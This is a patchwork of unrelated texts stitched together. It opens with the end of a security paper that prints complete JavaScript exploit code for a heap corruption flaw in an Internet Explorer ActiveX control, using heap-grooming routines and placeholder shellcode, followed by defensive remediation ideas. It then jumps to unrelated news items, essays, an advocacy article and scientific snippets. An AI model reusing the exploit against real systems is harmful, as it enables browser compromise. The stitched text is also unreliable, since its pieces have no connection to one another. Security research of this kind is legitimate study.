For more detailed information about the vtable , refer to the previous section .
The full exploit code is shown below :
// Create the ActiveX object var target = new ActiveXObject ( " DirectAnimation . PathControl " ) ; // Initialize the heap library var heap = new heapLib.ie ( ) ; // int3 shellcode var shellcode = unescape ( " %uCCCC " ) ; // address of jmp ecx instruction in IEXPLORE.EXE var jmpecx = 0x4058b5 ; // Build a fake vtable with pointers to the shellcode var vtable = heap.vtable ( shellcode , jmpecx ) ; //
Get the address of the lookaside that will point to the vtable var fakeObjPtr = heap.lookasideAddr( vtable ) ; // Build the heap block with the fake object address // // len padding fake obj pointer padding null // 4 bytes 0x200C - 4 bytes 4 bytes 14 bytes 2 bytes var fakeObjChunk = heap .
padding (( 0x200 c -4) /2 ) + heap.addr(fakeObjPtr ) + heap.padding ( 14/2 ) ; heap.gc( ) ; heap.debugHeap( true ) ; // Empty the lookaside heap .
debug ( " Emptying the lookaside " ) for ( var i = 0 ; i < 100 ; i++) heap.alloc( vtable ) //
Put the vtable on the lookaise heap .
debug ( " Putting the vtable on the lookaside " ) heap.lookaside( vtable ) ; // Defragment the heap heap .
debug ( " Defragmenting the heap with blocks of size 0x2010 " ) for ( var i = 0 ; i < 100 ; i++) heap.alloc( 0x2010 ) //
Add the block with the fake object pointer to the free list heap .
debug ( " Creating two holes of size 0x2020 " ) ; heap.freeList(fakeObjChunk , 2 ) ; // Trigger the exploit target .
KeyFrame ( 0x40000801 , new Array ( 1 ) , new Array ( 1 ) ) ; // Cleanup heap.debugHeap( false ) ;
Remediation
This section of the paper will briefly introduce some ideas for protecting browsers against the exploitation techniques described above .
Heap isolation
The most obvious , but not completely effective , method for protecting the browser heap is to use a dedicated heap for storing JavaScript strings .
This requires a very simple change in the OLEAUT32 memory allocator and will render the string allocation technique completely ineffective .
The attacker will still be able to manipulate the layout of the string heap , but will have no direct control over the heap used by MSHTML and ActiveX object .
If this protection mechanism is implemented in a future Windows release , we expect exploitation research to focus on methods for controlling the ActiveX or MSHTML heaps through specific ActiveX method calls or DHTML manipulations .
In terms of security architecture , the heap layout should be treated as a first class exploitable object , similar to the stack or heap data .
As a general design principle , untrusted code should not be given direct access to the heap used by other components of the application .
Non-determinism
Introducing non-determinism into the memory allocator is a good way to make heap exploitation more unreliable .
If the attacker is not able to predict where a particular heap allocation will go , it will become much harder to set up the heap in a desired state .
This is not a new idea , but to our knowledge it has not been implemented in any major operating system .
Conclusion
The heap manipulation technique presented in this paper relies on the fact that the JavaScript implementation in Internet Explorer gives untrusted code executing in the browser the ability to perform arbitrary allocations and frees on the system heap .
This degree of control over the heap has been demonstrated to significantly increase the reliability and precision of even the hardest heap corruption exploits .
Two possible avenues for further research are Windows Vista exploitation and applying the same techniques to Firefox , Opera and Safari .
We believe that the general idea of manipulating the heap from a scripting language is also applicable to many other systems that allow untrusted script execution .
Manmyung Kim , Kyunglyul Hyun , Jongmin Kim , Jehee Lee
ACM Transactions on Graphics ( Proceedings of SIGGRAPH ) , 2009
Abstract
The ability to interactively edit human motion data is essential for character animation .
We present a novel motion editing technique that allows the user to manipulate synchronized multiple character motions interactively .
Our Laplacian motion editing method formulates the interaction among multiple characters as a collection of linear constraints and enforces the constraints , while the user directly manipulates the motion of characters in both spatial and temporal domains .
Various types of manipulation handles are provided to specify absolute / relative spatial location , direction , time , duration , and synchronization of multiple characters .
The capability of non-sequential discrete editing is incorporated into our motion editing interfaces , so continuous and discrete editing is performed simultaneously and seamlessly .
We demonstrate that the synchronized multiple character motions are synthesized and manipulated at interactive rates using spatiotemporal constraints .
Late last year , Gamasutra said they 'd heard of a game Warren Spector ( Deus Ex ) was working on with Disney .
Said it was a " steampunk " title .
Looks like they were right on the money .
Advertisement
Advertisement
The website of concept artist Fred Gambino ( via Superannuation ) has some pieces for a project called " Epic Mickey " , described as an " interactive game " .
Which just so happens to be the same codename from the Gamasutra article .
Interesting !
Most interesting is the fact the artwork on Gambino 's site differs from that described in the original Gamasutra piece , meaning we 've got some bonafide corroboration going on here , making the whole thing feel awfully legitimate to us .
Advertisement
It 's unclear what the status of this project is at the moment , or what the final game will actually play like ( though rumours suggest it 's a platformer ) , but we certainly like the direction it 's taking , incorporating not just Disney characters , but the theme parks as well .
A floating Epcot Center dreadnaught , complete with Monstro hull and Steamboat propulsion , is something we never thought we'd see , but are super - glad we did .
Advertisement
Fredgambino [ via Superannuation ]
Advertisement
UPDATE - cuyahoga over on GAF has done a little more digging , and found the portfolio ( always with the artist portfolios ! ) of Gary Glover , who it seems is also / has worked on the game .
Among his pics is this jaw - dropping beach landing scene , which was described in the original Gamasutra article .
" Basically this character was one of the people that had been running EBank for a while .
He took a bunch of ( virtual ) money out of the bank , and traded it away for real money , " said Ned Coker , of the Icelandic company CCP , which developed the game .
The CEO of EBank , a 27 - year - old Australian tech worker who identified himself only as Richard and used the online name Ricdic , embezzled about 200 billion interstellar kredits , the game 's virtual currency .
He broke the rules of the game by exchanging the stolen virtual funds for $ 6300 Australian ( $ 5100 ) with players who preferred to buy virtual money rather than earn it playing the game .
" It was a very on the spot decision , " the married father of two explained in an interview .
He said a spam email for a black market website that traded online money for real cash popped up on his screen , prompting him to exchange the virtual cash for real money to cover a deposit on his house and expenses related to his son 's medical problems .
" I saw that as an avenue that could be taken , and I decided to skim off the top , you could say , to overcome real life ( difficulties ) . "
Word of the theft spread quickly within EVE .
Panicked customers started a run on the bank , worried that they would lose the money they had amassed by hunting space pirates or mining asteroids .
Ironically , if Ricdic had merely stolen the online money he could have stayed in the game .
But exchanging the virtual cash for real dollars broke the rules and CCP banned Richard 's EBank accounts .
" It unbalances the game , " Coker said .
Players can only buy virtual money with real money , or use virtual cash to pay for playing time , but they cannot exchange game money for the real thing .
" We have never seen ourselves as gods who make the rules of social interaction , " said Eyjolfur Gudmundsson , an economics adviser to CCP .
" You are able to lose the things you have created .
That 's what makes the world interesting . "
Ironically , Richard had built a reputation as one of EVE 's few trusted players - a rare commodity in a game where repeatedly blowing up a violator 's spaceship was the only way to enforce some contracts .
Asked if he had any regrets about the scam , Richard said he felt he let down his fellow EBank staffers , many of whom he considered friends .
" I 'm not proud of it at all , that 's why I did n't brag about it .
But you know , if I had to do it again , I probably would 've chosen the same path based on the same situation , " he said .
EBank survived the crisis .
But Richard will not be returning to EVE anytime soon .
" At the moment , we 've got our hands full , " Richard said about his family responsibilities in the real world .
Reuters
AIPAC Bill will Destroy More American Jobs by Institute for Research : Middle Eastern Policy
Tuesday Jun 23rd , 2009 8:26 AM
AIPAC legislated restrictions on US businesses and workers already cost 100,000 American jobs per year .
New AIPAC legislation targeting Iran could lead to further jobs loss .
An AIPAC effort on Tuesday seeks to cut off U.S. loans to some American companies doing business with India and Iran .
US exports to Iran have boomed in recent years as grain and other foodstuffs find eager buyers .
But AIPAC sponsored amendments to the draft fiscal 2010 State and foreign operations appropriations bill will give members their first chance to vote on binding Iran policy since that country ’s presidential election June 12 .
Rep. Mark Steven Kirk , R - Ill. , said the AIPAC amendment targeted Reliance Industries , a large energy company based in India that reportedly has provided Iran with as much as a third of its refined petroleum .
Kirk will offer the measure when the House Appropriations Committee takes up the draft bill on Tuesday .
Kirk is the 2008 top recipient of Israel stealth PAC contributions according to the Washington Report on Middle East Affairs .
He received $ 91,200 in the 2008 election cycle and more than $ 221,000 over his career .
A US court is still debating whether to regulate AIPAC as a political action committee after it was shown secretly directing such funding in violation of US campaign finance laws in the 1990s .
“ This will be the first vote on a substantive issue with regard to Iran since the election imploded , ” Kirk said .
Kirk aims to block the U.S. Export - Import Bank ( EXIM ) from providing loan guarantees to companies supplying gasoline to Iran .
Although Iran is a large exporter of unrefined crude oil , it lacks capacity to produce gasoline and imports 40 percent of its gasoline , a situation the Israel lobby has long sought to exploit .
The EXIM encourages firms to buy U.S. goods and services by providing loan guarantees for companies overseas .
The Ex - Im has provided Reliance with loan guarantees totaling $ 900 million , including a half billion to build the world ’s sixth - largest refinery in Jamnagar , India .
Project equipment , supplies and expertise are source from the US .
Kirk stated the company ’s role in exporting a large share of producing to Iran ’s refined petroleum makes it an AIPAC target .
“ We think it would be good for Reliance just to choose not to do business with Iran . ”
Potential Job Impact
US firms Bechtel Corp. and Dow Global Technologies are involved in the refinery ’s construction and contracting US equipment and services for the venture .
“ It struck me as a little strange that we ’re going to hamstring American companies in the middle of the worst recession in decades , ” said Patrick Disney , legislative director at the National Iranian American Council .
Although the funds for the Jamnagar project have already been disbursed , if the amendment is made retroactive it could apply to the project and other past transactions targeted by AIPAC .
Experts say the move would also undermine confidence in the Export - Import Bank ( EXIM ) and add to US unemployment in high paying fields such as engineering services .
The EXIM bank said that the new refinery would not provide gasoline to Iran , but Kirk replied that he thought " nuances like that fall on deaf ears as the situation has come apart in Iran , ” he said .
Kirk was frank about the true backers of his plan : “ Our amendment is a go because AIPAC supports it . ”
Kirk referred to the American Israel Public Affairs Committee , a domestically registered lobby created and led by a former employee of the Israeli Ministry of Foreign Affairs Isaiah L. Kenen after its predecessor was forced by the Department of Justice to register as a foreign agent .
Grant Smith , the director of the Institute for Research : Middle Eastern Policy ( IRmep ) was critical of Kirk 's move and the legislation 's sponsor .
" AIPAC has a history of pushing policies that ultimately harm US workers and the American economy .
The flawed US - Israel bilateral trade agreement has cost the US 100,000 jobs per year over the last decade .
Other legislative initiatives pushed by the Israel lobby have negatively impacted the US share in the Arab market , which dropped from 12.77 % in 1997 to 8.55 % in 2008 .
American workers do n't want to become innocent victims of AIPAC 's trade and foreign policy adventures . "
Select image for high or low resolution and caption .
Use arrows or page numbers below for more thumbnails .
This just came in over the press - wire , and I ’m already interested .
Cisco has announced on June 23 that a new Linux powered router , the Linksys by Cisco Wireless - N Broadband Router with Storage Link , the WRT160NL is out .
At first glance that may not seem that interesting .
But , this is n’t just a new Wi -Fi router with Linux .
Cisco , via its Linksys subsidiary has long been offering users Linux - powered , hackable Wi-Fi routers like the WRT54GL .
But , this one also includes integrated Storage Link functionality that lets you use inexpensive USB storage devices as NAS ( Network Attached Storage ) and a built - in media - sharing server that Cisco says can handle video , photo , and music sharing .
Since Cisco has recently made peace with the Free Software Foundation , we can count on the WRT160NL being wide - open for firmware developers .
With that combination of NAS and media - server already in there , this sounds to me to be one very interesting device for those of us who like to tamper with our Wi-Fi and storage hardware .
What we know now is that the Storage Link port , a USB 2.0 port , will let you connect USB storage devices to the router .
You can control access to them through the device ’s Web page .
From there you can also control access to your music and video files .
According to Cisco , “ The media server can stream to PCs or UPnP ( Universal Plug and Play ) AV digital media adapters .
For a while UPnP was something of a dead protocol for media devices .
In the last few months though UPnP is showing signs of life , and I think UPnP devices like DirecTV ’s HR - 21 HD might yet become a real challenger to Apple TV , which , proprietary and all , is still the best media - extender around .
I wish I knew more about the WRT160NL ’s media server , but none of the online documentation goes into any detail on it .
I hope to have a review copy in hand soon to be able to report what ’s what with it .
The integrated Storage Link port comes ready to support FAT16 , FAT32 and NTFS file systems .
I ’ll make the easiest prediction I ’ll ever make by saying that I expect to see Linux file formats like Ext3 and Ext4 running on it soon .
Like all too many devices , it only comes with a Windows and Mac setup software .
On the other hand , any experienced home network or Linux user should n’t have a bit of trouble getting it setup to work with Linux .
For security , the WRT160NL supports WEP , WPA , WPA2 , RADIUS , SPI Firewall .
It also supports NAT and Wireless MAC filtering .
The WRT160NL uses 802.11n draft 2.0 certified for Wi-Fi .
Someday , somehow , 802.11n will finally become a real standard , but that day still has n’t happened .
Like all such devices , it also supports 802.11 b and 802.11g .
The WRT160NL also comes with 4 Ethernet / Fast Ethernet ports .
It ’s a pity it does n’t come with Gigabit Ethernet .
The WRT160NL uses a 400 Mhz processor .
I ’m not sure , but I believe that ’s an Atheros 9130 400 MHz CPU under the hood .
It also has 8 MBs of Flash memory , and 32 MBs of DDRAM .
That ’s not enough to turn it into a full - scale server in a Wi -Fi box , but it ’s more than enough to support the functionality it already comes with and to offer some very interesting possibilities for home hackers .
Personally , I ’m already planning to see just how much functionality I can squeeze into this box as a media server .
With a list price - tag of $ 110 , this is one device I ’m really looking forward to getting my hands on .
To offer some perspective , he retrieved , from a vault within the vault , one of the library ’s oldest and most precious maps , a so - called Portolan chart of the Mediterranean , dating to 1456 .
It showed the sea ’s entire coastline , with hundreds of ports labelled in the manner of stations on a railroad map , the names neatly lined up parallel to one another , in the order in which one would encounter them if one were sailing along the coast .
“ The tension between these two modes of navigating goes back to these maps , ” he said .
“ The itinerary represents space as one experiences it on the ground .
A map like this has that element , but it starts to introduce the notion that you can conceive of it as a larger unit .
It ’s a God ’s - eye view , which puts you in charge of navigating through space .
This is the origin of the notion that you can pull yourself away from the world and see it from above . ”
The irony is that centuries later , when we have perfected the God ’s - eye map and become conversant with it , we have , in the thrall of technology , turned back to the ancient way : the itinerary and the strip map .
OnStar and MapQuest zero in on the information that ’s relevant to reaching your destination .
“ They close down your choices and give you a route , ” Akerman said .
It can be amusing to see what MapQuest and its ilk come up with .
They do n’t always work .
For example , I recently looked to see how MapQuest would get me from East Ninety - sixth Street in Manhattan to the North Shore of Long Island , an hour - long trip that I and countless other drivers have honed ( with variations for personal preference , traffic avoidance , and monotony - breakage ) over the years .
Triborough Bridge to the Grand Central Parkway to the Whitestone Expressway to the Cross Island Parkway to the Long Island Expressway .
Bing - bang - boom .
MapQuest had an unprecedented suggestion : take the Triborough Bridge to the Bruckner Expressway and then to the Throgs Neck Bridge .
From the Upper West Side , a few traffic lights west , MapQuest , snickering , guides you to the Cross Bronx Expressway and then to the Throgs Neck .
The Cross Bronx ?
It would seem that the algorithms are new to the area .
These directions involve a disconcerting degree of noncontiguousness .
Why cross a body of water at its widest possible point ?
Why even mess with the Bronx ?
You may as well stick a sandwich in your ear before putting it into your mouth .
Generally , MapQuest and OnStar choose a road based on their calculations of which will get you there fastest .
The criterion is time , a function both of speed and of distance .
They do not , as some people suspect , simply pick the shortest route ; otherwise , you might spend all your time on side streets , stuck at traffic lights or goat crossings .
The algorithms consider the length of a road segment and the expected speed of the road and calculate the time it will take you to pass along it .
Every road segment has a “ costing , ” a sum of the features that can slow a driver down .
Turns , merges , exits , toll plazas , stoplights , speed zones : they all carry a cost .
( Navteq has five “ functional classes ” of road , ranked according to connectivity and speed .
An interstate highway is a one ; a local street is a five . )
These systems do not yet take into consideration traffic , construction , weather , time of day , or one ’s tendency , on certain roads , to go faster than the speed limit .
There are features that we associate with maps or navigation which have little bearing on the kind of road directions favored by MapQuest and OnStar .
Traditional visual landmarks — flagpole , river bend , stone church — are hardly recognized .
And a road that traverses water ( i.e. , a bridge ) is no different from one that cuts through a golf course or a drug - free school zone if the speed limit is the same .
This is why the Throgs Neck looks more reasonable to an algorithm , even if to a driver that extra water crossing may mean another toll and greater potential for bottleneck traffic .
With MapQuest , you can either look at a map , presented in a manner that makes your route the center of the world , or you can get an itinerary .
But , since MapQuest ’s directions are derived from looking at a route on a map , the advice it gives is based mostly on map reality , not driver reality .
Traditionally , verbal directions capture the experience of driving on the road , much as the McNally Photo - Auto Guide did ; MapQuest captures that of plotting the route , from a God ’s - eye view .
This is why , for instance , MapQuest will identify a short stretch of road — an off - ramp , a connector — that to the traveller would normally be negligible ( without mentioning that you should keep the river or the graveyard on your right ) .
Whether a segment is 0.1 or two thousand miles long , it is given equal billing .
This sometimes has a ludicrous effect .
For example , Google ’s directions for leaving Spokane , Washington : “ Head north from N. Lincoln St. , go 33 feet .
Turn left at W. Main Ave. , go 0.1 mi .
Turn left at W. Spokane Falls Blvd. , go 127 feet . ”
Certainly , once someone following this kind of itinerary loses his way he has no idea where he is , because he has no sense of how the directions he ’s following fit into the larger picture .
Most navigation devices in cars display your route on a small dashboard screen ; the settings can be altered , but more often than not the top of the display represents the direction in which you are moving .
The onscreen map , in other words , is not oriented north - south , like a paper map .
The map constantly readjusts itself , so that the road ahead is up .
This is a boon to people who may be disinclined to see the ground in terms of north - south — people who when standing on a street corner will hold a paper map and turn it so that what is in front of them on the ground is also in front of them ( above them ) on the map .
As to the age - old and oft - debated question of whether women are more apt to do this than men — of whether geographic proficiency correlates to one gender or the other — there is a great deal of straight - faced academic research .
Suffice it to say that the scholarship is inconclusive , though it does tend to find that men and women , whether by nature or by nurture , perceive space differently .
At any rate , the in - car map displays generally represent small swatches of land , your immediate surroundings .
You can zoom in and zoom out , but the area you ’re passing through is a disembodied square , free of the context of the larger landmass .
For example , as you pass along the Bruckner , on your way to the Throgs Neck , you see a web of lines , and words like “ Port Morris ” and “ Hunts Point . ”
What you tend not to see is where the Bruckner and the Bronx fit into the bigger picture — the Bronx poised like a catcher ’s mitt between the legs of Manhattan and Long Island , the southernmost wedge of New York State mainland breaking up into an archipelago .
You do not see , in other words , how taking the Throgs Neck might appear , on a standard map , to be a detour .
In the spirit of fair - mindedness , I tried this route one Saturday morning , when there would likely be little traffic to corrupt the results of the experiment .
The affront to both habit and the inner compass — every fibre crying out , “ Turn east , east ! ” — was especially acute as , per MapQuest , I followed signs directing me to New England , instead of to Long Island .
So was the unpleasant prospect of paying the additional toll of four - fifty that the Throgs Neck would require : a deal - breaker , especially if you ’re one of those people who plot routes primarily on the basis of toll avoidance .
( You know the type : he loves the Macombs Dam Bridge . )
Still , I stayed with it .
The road was clear and fast , the prospect — Rikers Island , from the north !
— refreshing .
As the Throgs Neck Bridge conveyed me onto Long Island , and I rejoined the usual route , on the Cross Island Parkway , I noted , on the digital clock on the dash , that I ’d made great time .
Perhaps this way was a minute or two longer .
Hardly more .
Over the years , those minutes , not to mention the toll payments , could add up , but still : MapQuest ’s algorithms had apparently opened an iconoclastic alternate route , a Long Island commuter ’s Northwest Passage .
Chicago , you might say , is the Sagres of the American imperium , a hub of geographic and cartographic expertise .
This is due mainly to Chicago ’s role , in the nineteenth century , as a major railroad center .
Rand McNally ( “ to maps what Jell - O is to gelatine , ” as Akerman said ) was based there ( it is now just up the pike , in Skokie ) , as were many other prominent map publishers .
The University of Chicago had , until recently , one of the best geography departments , and is still a leading publisher of scholarly books on geography and cartography .
Navteq ( the name is a contraction of Navigation Technologies ) started life in 1985 , in Silicon Valley , and moved to Chicago in 1997 .
Its revenues have tripled since 2002 , amid the digital mapping boom .
It occupies an ever - expanding suite of offices on an immense floor of the Merchandise Mart , one of the largest commercial buildings in the world .
It would be wise , when visiting Navteq , to bring bread crumbs or a handheld G.P.S. to keep from getting lost .
One morning this fall , in a conference room I ’m sure I could never find again , I met Judson Green , the company ’s C.E.O. , and Salahuddin Khan , a senior vice - president , who supervises the complicated task of converting raw data , including the observations of analysts like Arcari and Singh , into lefts and rights .
Navteq is as much a collator of information as a collector of it .
The raw information comes from a variety of sources , including the government — for example , from what are known as TIGER files , prepared by the Census Bureau .
This information is in the public domain .
A lot of it is out of date , idiosyncratic , incompatible , and , at the very least , requires cleaning up .
Digital aerial photography is used as well .
The existing data , from the government and other sources , had not been collected with way - finding in mind , so it was necessary to look at the world again through the eyes of a driver , instead of those of a tax collector or a land surveyor — “ to add all the attributes no one ever thought to add because they were n’t thinking of navigation in the first place , ” Khan said .
“ Guidance , one - way systems , no left turns .
Does something go under or over when you have two lines that cross a map ? ”
Khan , who was born in Pakistan , is placid and precise , with a neatly trimmed beard and a slight burr , a vestige of more than three decades in Britain .
He happened to be heading out himself the following day to do a little ground - truthing in Wyoming .
“ It ’s like news reporting , ” Khan said .
“ You could not do it all from Washington .
You need to have stations and field offices in order to get that local knowledge . ”
Khan has three cars and a single - engine plane ; being a pilot ( and , by training , an aeronautical engineer ) got him interested , years ago , in moving maps , in which the map centers on your present location — a kind of predecessor to the devices employed in cars these days .
He began using navigational systems well before he came to Navteq , in 1998 , and finds it strange that in this day and age someone would have a road atlas in the car .
“ Maybe that ’s a guy thing , ” he said .
He is a self - professed “ map nut , ” but really more of a gearhead .
“ Historically , I had what I would call ‘ lost anxiety ’— anxiety about being lost , ” he said .
“ I then got to experience navigation systems .
And I feel that I have effectively diluted lost anxiety out of my system .
In other words , I ’ve been conditioned not to be anxious when lost , even when I am in a vehicle that does not have a navigation system . ”
As he calmly summoned a world in which technology would do away with the experience of going astray , I began reassessing , in the rearview mirror of my mind , all the times I ’d been lost or confused , angry at the map or the person next to me who could n’t make sense of it .
Panic in a New Jersey rotary ; despair in the pitch black of the Poconos at night ; the shame , after you ’ve got on the wrong highway , of hurtling past a sign saying “ NEXT EXIT 13 MILES . ”
All the rash U - turns and frantic attempts to get the attention of the driver in the next car — you give him the now quaint but still widely recognized “ roll down your window ” signal and shout helplessly across the gulf , “ Where can I find Route 17 ? ” Yours for the violent ward , straight and sure .
For the first time , I began to think that one of those devices might not be such a bad idea .
Even map nuts get lost .
By By Andrew Moran Aug 10 , 2009 in Business Peter Schiff , President of Euro Pacific Capital and Author of Crash Proof , predicted this current economic collapse and is now saying that higher stocks does not meant recovery .
Peter Schiff told The Hang Seng Index has been rising dramatically since March with 10,000 points .
German Dax has doubled since March .
The Shanghai Composite Index has also doubled since February .
For years now , Schiff has been investing abroad and moved out of the U.S. Dollar and the U.S. economy because of its “ phony wealth ” practice .
Schiff called the recession two years before it was officially declared by the government .
Schiff explained at goldseek.com that there is an unfathomable but widely held belief that stock market movements are indicators of present and future economic conditions , “ Reality is clearly at odds with these optimistic assumptions .
In the current cycle , neither the market nor its cheerleaders saw this recession coming , so why should anyone believe that these fonts of wisdom have suddenly become clairvoyant ? ”
On Analysts now state that the recession is coming to a halt and to be bullish on the economy , Schiff believes the worst is yet to come and that He has advised people to buy commodities , specifically Peter Schiff will be running for
The current rise in the stock market in the United States has ventured many analysts , including President Barack Obama , to declare that recession is nearing its end however ; one man does not think it is coming to an end but just beginning .
Peter Schiff told Money News Monday , “ In fact , relative to the meteoric rise of foreign stock markets over the past six months , U.S. stocks are standing still .
If anything , it is the strength in overseas markets that is dragging U.S. stocks along for the ride .
" The Hang Seng Index has been rising dramatically since March with 10,000 points .
German Dax has doubled since March .
The Shanghai Composite Index has also doubled since February .
For years now , Schiff has been investing abroad and moved out of the U.S. Dollar and the U.S. economy because of its “ phony wealth ” practice .
Schiff called the recession two years before it was officially declared by the government .
Schiff explained at goldseek.com that there is an unfathomable but widely held belief that stock market movements are indicators of present and future economic conditions , “ Reality is clearly at odds with these optimistic assumptions .
In the current cycle , neither the market nor its cheerleaders saw this recession coming , so why should anyone believe that these fonts of wisdom have suddenly become clairvoyant ?
” On Fox News , CNN , CNBC and other mainstream news networks , analysts laugh and scorned Schiff for his doom and gloom views on the American economy however , years later , he is right , “ If they could not even forecast a recession that had already started , how can they possibly predict when it will end ?
” Analysts now state that the recession is coming to a halt and to be bullish on the economy , Schiff believes the worst is yet to come and that hyperinflation is the next major factor to draw concern for Americans .
He has advised people to buy commodities , specifically gold and silver to protect against inflation , and invest abroad in places like China , Australia , Canada and Singapore and to buy Swiss Francs , Australian Dollars and Singapore Dollars .
Peter Schiff will be running for Senator in the state of Connecticut against the current five - term Senator Chris Dodd in 2010 .
More about Peter schiff , Senate seat , Economic collapse
More news from peter schiff senate seat economic collapse
Them Crooked Vultures , featuring Dave Grohl , Josh Homme and John Paul Jones have posted a small portion of a track on You Tube .
The Promo is a snippet of a song named “ nobody likes me and neither do i ” .
As well as the promo the band have released picture , merchandise an a forum has been launched in their themcrookedvultures.com site .
Dave Grohl who is back behind the drums for The Vultures has told the world that the group would release an album of the songs that were played at thier debut this monday ( 10th August ) in the Metro , as well as tour the US .
No dates , however , for either of these events have been released .
Recently someone asked me how to give funnier talks .
My first response was to recoil at such an insolent question : does n’t everyone know that at the core of my shtick lies a unique and ineffable je ne sais quoi that ca n’t be packaged , bottled , or resold ?
But the truth was not that I could n’t give advice ; it ’s that I did n’t want to .
For if everyone knew how easy it was to keep an audience at least half - awake , how would people like me maintain their edge ?
By proving better theorems ?
Having something new and relevant and say ?
These questions answer themselves .
But because I love you , my readers , so deeply , and because I feel guilty about abandoning you for so long , I shall now publicly deconstruct the main ingredients of seminar humor , insofar as I ’ve been able to find them .
( A few ingredients are specific to theoretical computer science , but most are more general . )
Make fun of people in the audience .
( Of course , you have to do it in such a way that they ’re flattered you ’re ripping them and not someone else . )
Ridicule bogus claims related to your topic , particularly claims that received wide currency in the popular press .
( To be honest , I do this not so much because it gets laughs — though it does — but as a small service to humanity .
If I can make one budding crackpot think twice before hitting “ Submit ” on a disproof of Bell ’s Theorem , I will not have lived in vain .
Of course , the ridicule should always focus more on ideas than people ; and even then , a few in the audience will frown on it , considering it unscientific or unprofessional .
Forty or fifty crackpots ago , I agreed with them .
It ’s only experience that hardened me into a vigilante . )
Incorporate the audience ’s shared experiences into your talk ( without making a big deal of it , as if it ’s the most natural thing in the world ) .
For example , when it comes time to trot out an Alice / Bob scenario , have yours wryly comment on a previous talk , an excursion everyone went on , a current event ( like an election ) that everyone actually cares about more than the talk …
Self - deprecate .
( “ My first conjecture was falsified .
The following conjecture has n’t yet been falsified , and is obviously true … ” )
Say things that recognize and comment on how neurotic the thought - process of theoretical computer scientists really is , by taking that thought - process to extremes .
( “ That ’s off by a factor of 1010 ^120 , which is only O ( 1 ) and is therefore irrelevant . ”
“ For years , people tried unsuccessfully to prove this sort of impossibility result was impossible .
Our result shows the impossibility of their goal . ” )
If your field is interdisciplinary , the humor potential is almost limitless .
Are you a physicist ?
Ridicule the computer scientists .
A computer scientist ?
Ridicule the mathematicians .
A mathematician ?
Ridicule the economists .
Chances are , enough differences in notation , terminology , assumptions , and underlying goals will arise in the talk to give you a never - ending supply of material .
“ Disciplinary humor ” is a more refined , intellectual variant of ethnic humor , and is effective for the same reasons .
Explain your results in an unusually vivid or graphic way .
( “ If , at the moment of your death , your whole life flashed before you in an instant , and if while you were alive you ’d performed suitable quantum computations on your own brain , then you could solve Graph Isomorphism in polynomial time . ” )
This type of humor is my absolute favorite : on a plot with laughter volume on one axis and scientific content on the other , it ’s way out on the upper - right - hand corner .
If you ’re using PowerPoint , take full advantage of its comic potential : wild animations , text that pops up on the screen to question or even flat - out contradict what you ’re saying , a punchline at the bottom of the slide that only gets revealed when you press a key , etc .
I love doing this because I have as much time as I need to “ precompute ” jokes ( though I ’ll then often elaborate on them extemporaneously ) .
Banter with the crowd : if someone makes a crack at your expense , always respond , and even escalate the interaction into a “ staged fight ” ( the rest of the audience will love it ) .
If someone catches you in a mistake , or you do n’t know the answer to a question , make a self - deprecating joke that acknowledges the situation even as it wins you sympathy points .
Have high energy !
Loud , lots of moving around , emotion in your voice … like you ca n’t wait to invite everyone along to the most exciting journey in the history of the universe .
Not only is that good practice in general ( at the least , it keeps the audience from falling asleep ) , it also creates a general atmosphere in which it ’s okay to laugh at jokes .
Pause a few beats before the punchline .
( You can get better at this by watching professional comics . )
Experiment !
If a particular joke bombs , drop it from your rotation ; if it brings the house down , recycle it in future talks .
Of course , you should drop a joke once it reaches its saturation point , where much of the audience has already heard it in previous talks .
On the other hand , if this particular audience has n’t yet heard the joke , disregard your own internal sense of its being “ tired ” : it could go over just as well as the first time , or better .
Steal ideas shamelessly from other speakers .
( I mean their humor techniques , not their results . )
Just as importantly , study the lame jokes other speakers use , so as to avoid them .
( For example , I estimate that 94 % of quantum computing talks include a heavy - handed comment about someone or something being “ in superposition ” ; this has not yet gotten a laugh .
Or the talks repeat stories about Feynman , Bohr , etc. that everyone in the audience has already heard a thousand times . )
Tailor your jokes to the audience ’s background .
For instance , I have some jokes that work great in the US , but sink in other countries .
Or work on physicists but not computer scientists , or vice versa .
Make jokes about the country you ’re visiting .
Of course , this is subject to common sense : I ’ve been known to resort to “ zed ” / “ aboot ” jokes in Canada , scone / royalty / powdered wig jokes in England , and neutrality / yodeling jokes in Switzerland , but I usually do n’t make the first joke that pops into my head when visiting Germany or Austria .
Take risks !
Here ’s an Umeshism : if some of your jokes do n’t flop , then you ’re not being bold enough .
Do things that people can’t believe anyone would actually do in a talk .
Most people seem to operate under the assumption that when they ’re giving a talk , they have to be less funny than in regular conversation , when the truth is the opposite .
If something comes into your head that ’s funny to you , and it passes the most flimsy and cursory of offensiveness checks … out with it , and worry later about the consequences !
Three final remarks .
First , reading over the list , I ca n’t help but feel sheepish about how much one can do with such a crude and obvious bag of tricks .
Second , I only wish I applied this crude bag more consistently !
Particularly when I have a new result and I ’m excited about the proof , I all too often ignore my own advice and lapse into boringness .
But at least I notice I ’m doing it , get annoyed at myself , and resolve to be crasser , less mature , and less professional the next time around .
Third , you might feel that adding shtick to your talks makes you “ shallow , ” that all that should matter is the content of your results .
In the relatively rare case where you ’re addressing experts in your own sub - sub - subfield , that ’s probably true : you can drop the funny business and get straight to the point .
In all other cases , I ’m almost certain the audience will understand your results better if you incorporate some shtick than if you do n’t .
But hey — it ’s up to you whether you want to address an ideal Platonic audience ( “ more lemmas ! no irrelevant distractions !
yes! harder ! faster ! ” ) or the actual flesh - and - blood hairless apes who are dozing off in the seminar room while you speak .
LONDON  Entering a debate that has stirred political tumult in Britain , Vice President Joseph R. Biden Jr. said in an interview broadcast Thursday that more coalition troops would die in Afghanistan but that the war was “ worth the effort . ”
Speaking during a tour of Ukraine and Georgia , Mr. Biden told the BBC that the lawless region along the Afghanistan - Pakistan border was “ a place that , if it does n’t get straightened out , will continue to wreak havoc on Europe and the United States . ”
His remarks have a particular resonance in Britain at a time when the American - led coalition has recorded some of its worst casualties since the overthrow of the Taliban regime in 2001 .
Britain has some 9,000 soldiers in Afghanistan  the second biggest contingent after the United States  and so far this month alone has lost 19 soldiers .
That brings Britain ’s total since 2001 to 188 , higher than its death toll in the Iraq war .
The latest fatalities came Wednesday , when bombs killed two United States service members and one Briton in southern Afghanistan .
This mid-infrared composite image was obtained with the Gemini North telescope on Mauna Kea , Hawai'i , on 22 July at ~ 13:30 UT with the MICHELLE mid-infrared spectrograph / imager .
The impact site is the bright yellow spot at the center bottom of Jupiter 's disk .
NASA needsmore cash in order to meet its goal of finding nearby space rocks that couldhit Earth in a devastating impact , a new report says .
